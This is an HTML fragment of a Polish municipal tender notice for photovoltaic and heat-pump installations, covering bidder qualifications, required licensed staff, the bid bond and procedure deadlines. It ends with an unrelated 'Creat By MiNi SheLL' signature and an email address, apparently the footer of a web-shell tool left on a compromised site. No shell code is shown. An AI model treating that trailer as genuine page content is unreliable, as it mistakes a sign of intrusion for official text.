class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zamawiający określa poniższe warunki udziału w postępowaniu dotyczące : <br/>1.1. Zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>1.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br/>1.3. Sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>.1.4.	zdolności technicznej lub zawodowej: <br/>Zamawiający stawia szczegółowe wymagania w zakresie oceny tych zdolności:<br/>A. o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne poziomy <br/> zdolności w zakresie doświadczenia, tj. Wykonawcy, którzy wykonali w okresie ostatnich <br/> pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest <br/> krótszy - w tym okresie co najmniej jedno zadanie polegające na wykonaniu minimum :<br/>•	20 kpl instalacji fotowoltaicznych;<br/>•	5 kpl instalacji pomp ciepła <br/>w ramach jednej umowy.<br/> UWAGA:<br/>•	Zamawiający dopuszcza wykonanie 20 kpl instalacji fotowoltaicznych w jednym zadaniu i wykonanie 5 kpl instalacji pomp ciepła w drugim zadaniu; <br/>•	Zamawiający dopuszcza wykazanie się zadaniem, które Wykonawca wykonał w formule „dostawa z montażem”.<br/>Wykonawca potwierdza spełnianie warunku w pierwszej kolejności poprzez złożenie wraz z ofertą Oświadczenia własnego, o którym mowa w pkt. 7.1.<br/><br/>A)	o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie doświadczenia, tj. Wykonawcy, którzy wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:<br/>a)	co najmniej jedną usługę projektową polegającą na zaprojektowaniu instalacji pomp ciepła o łącznej mocy minimum 30 kW.<br/>b)	co najmniej jedną usługę projektową polegającą na zaprojektowaniu instalacji fotowoltaicznych o łącznej mocy minimum 100 kWp.<br/>B)	o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie osób, które zostaną skierowane przez wykonawcę do realizacji zamówienia tj. którzy wykażą, iż dysponują lub będą dysponować: <br/>a)	co najmniej 1 osobą, która pełnić będzie funkcję kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej, <br/>b) co najmniej 1 osobą, która pełnić będzie funkcję kierownika robót branży elektrycznej posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, <br/>c)	co najmniej 1 osobą, która pełnić będzie funkcję kierownika robót branży sanitarnej posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych, <br/>d)	co najmniej 1 osobą, która pełnić będzie funkcję projektanta branży konstrukcyjno – budowlanej posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno – budowlanej;<br/>e)	co najmniej 1 osobą, która pełnić będzie funkcję projektanta branży elektrycznej posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br/>f)	co najmniej 1 osobą, która pełnić będzie funkcję projektanta branży sanitarnej posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych.<br/>Wykonawca potwierdza spełnianie warunku w pierwszej kolejności poprzez złożenie wraz z ofertą Oświadczenia własnego, o którym mowa w pkt. 7.1. <br/>Uwaga: <br/>1)	Zamawiający wymaga, aby warunek opisany w pkt B spełniał Wykonawca samodzielnie a w przypadku polegania na zasobach podmiotu trzeciego – ten podmiot. W przypadku Wykonawców wspólnie ubiegających się o udzielnie zamówienia warunek opisany w pkt B winien spełnić jeden z Wykonawców wspólnie ubiegających się o zamówienie.<br/>2) Zamawiający dopuszcza, aby warunek opisany w pkt C Wykonawcy/Wykonawcy wspólnie ubiegający się o udzielnie zamówienia spełniali łącznie.<br/>3)	Posiadane uprawnienia budowlane powinny być adekwatne do zakresu wykonywanych czynności objętych przedmiotem zamówienia.<br/>4)	Dopuszcza się łączenie funkcji poszczególnych kierowników budowy/robót pod warunkiem wykazania posiadania odpowiednich uprawnień.<br/>5)	Przez ww. uprawnienia budowlane Zamawiający rozumie uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. 2021 r, poz. 2351 ze zm.) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2021 r. poz. 1646). <br/>W przypadku osób, które są obywatelami państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) – stron umowy o Europejskim Obszarze Gospodarczym (w rozumieniu art. 4a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz.U. z 2019 r., poz. 1117)), osoby wyznaczone do realizacji zamówienia posiadają uprawnienia budowlane do projektowania/ kierowania robotami budowlanymi, wyszczególnione wyżej jeżeli: <br/>•	nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień budowlanych do projektowania/kierowania robotami budowlanymi, oraz <br/>•	posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych lub w przypadku braku decyzji o uznaniu kwalifikacji zawodowych zostały spełnione w stosunku do tych osób wymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa, dotyczące świadczenia usług transgranicznych. <br/>Zamawiający na etapie składania i oceny ofert nie wymaga, aby te osoby poza legitymowaniem się posiadaniem uprawnień budowlanych zdobytych poza terytorium Polski, musiały dysponować odpowiednią decyzją o uznaniu kwalifikacji zawodowych lub w przypadku braku decyzji o uznaniu kwalifikacji zawodowych, by spełniły wymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. 2019 r., poz. 1117 ze zm.), dotyczące świadczenia usług transgranicznych, tj. aby uzyskały one tymczasowy wpis na listę członków właściwej izby samorządu zawodowego. <br/>Na podstawie art. 104 ustawy Prawo budowlane osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. <br/>Zakres uprawnień budowlanych będzie odczytany zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. W celu uniknięcia wątpliwości zaleca się podanie przez wykonawcę daty wydania uprawnień i dokładne cytowanie zakresu uprawnień z posiadanego zaświadczenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie są wymagane</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające spełnianie warunków udziału w <br/> postępowaniu:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>b)	wykaz usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy;<br/>c) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie określa przedmiotowych środków dowodowych - z wyjątkiem przypadków gdy wykonawca oferuje rozwiązania równoważne - w takim przypadku zamawiający żąda złożenia przedmiotowych środków dowodowych wraz z ofertą . Jeżeli wykonawca ich nie złoży lub złoży niekompletne , zostanie wezwany do ich uzupełnienia./ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Przedmiotowe środki dowodowe na potwierdzenie rozwiązań równoważnych , w szczególności tych o których mowa w art. 101 ust.5 i 6 PZP. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć: <br/>1)	aktualne na dzień składania ofert odpowiednio oświadczenia, o których mowa w pkt 7.1,7.3 i 7.6.3) SWZ,<br/>2)	zobowiązanie podmiotu do udostępnienia zasobów, jeżeli wykonawca polega na zasobach innego podmiotu,<br/>3)	oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (jeżeli dotyczy);<br/>4)	dowody równoważności, o których mowa w pkt 3.10. SWZ, jeżeli wykonawca zaoferował rozwiązania równoważne w stosunku do określonych w opisie przedmiotu zamówienia;<br/>5)	uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa, jeżeli wykonawca zastrzegł w ofercie informacje jako tajemnicę przedsiębiorstwa;<br/>6)	potwierdzenie wpłaty wadium (jeżeli zostało wpłacone w pieniądzu),<br/>7)	pełnomocnictwo (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 10.1.	W celu zabezpieczenia roszczeń określonych w art. 98 ust. 6 ustawy Pzp Oferta winna być zabezpieczona wadium w wysokości 50.000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100). <br/>10.2.	Wadium należy wnieść przed upływem terminu składania ofert wskazanym w pkt 14.1. SWZ. <br/>10.3.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą. <br/>10.4.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach: <br/>•	pieniądzu; <br/>•	gwarancjach bankowych; <br/>•	gwarancjach ubezpieczeniowych; <br/>•	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <br/>10.5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w Banku PKO BP SA II/O Częstochowa nr 95 1020 1664 0000 3202 0028 4604 z dopiskiem WADIUM – ZP.271.10.2022. <br/>10.6.	Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto zamawiającego przed upływem terminu składnia ofert. <br/>10.7.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/>10.8.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 10.4 ppkt 2)–4), wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>10.9.	W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczenia, gwarancja lub poręczenie powinno być sporządzone zgodnie z obowiązującym prawem i winno zawierać następujące elementy: <br/>1)	nazwę dającego zlecenie (wykonawcy) (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia – zaleca się wymienienie wszystkich wykonawców), beneficjenta gwarancji lub poręczenia (zamawiającego), gwaranta lub poręczyciela (np. banku lub instytucji ubezpieczeniowej udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib, <br/>2)	określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem, <br/>3)	kwotę gwarancji lub poręczenia, <br/>4)	termin ważności gwarancji lub poręczenia (który nie może być krótszy niż termin związania wykonawcy złożoną przez niego ofertą), <br/>5)	gwarancja lub poręcznie winna umożliwić wniesienie roszczenia za zdarzenie mające miejsce w okresie obowiązywania terminu związania ofertą również po jego upływie, <br/>6)	zobowiązanie gwaranta lub poręczyciela do nieodwołalnej, bezwarunkowej zapłaty kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie zamawiającego zawierające oświadczenie, iż: <br/>a)	wykonawca, którego ofertę wybrano: (i) odmówił podpisania umowy na warunkach określonych w ofercie, lub (ii) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, lub (iii) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy; <br/>b)	wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 Pzp lub art. 128 ust. 1 Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 Pzp lub art. 106 ust. 1 Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej <br/>7) oznaczenie postępowania, którego wadium dotyczy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>2)	W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>3)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 7.1., składa każdy z wykonawców. Oświadczenia te dołączone do oferty potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>4)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w pkt 6.3, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Formularz oświadczenia stanowi załącznik do SWZ. <br/>5)	Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy . Rodzaj, zakres zmian oraz warunki ich wprowadzania opisuje projekt umowy - załącznik do swz. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca sklada oferte za pośrednictwem &#34;FORMULARZA DO ZŁOŻENIA , ZMIANY WYCOFANIA OFERTY LUB WNIOSKU&#34; dostępnego na ePUAP i udostępnionego na mini-portalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-11 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com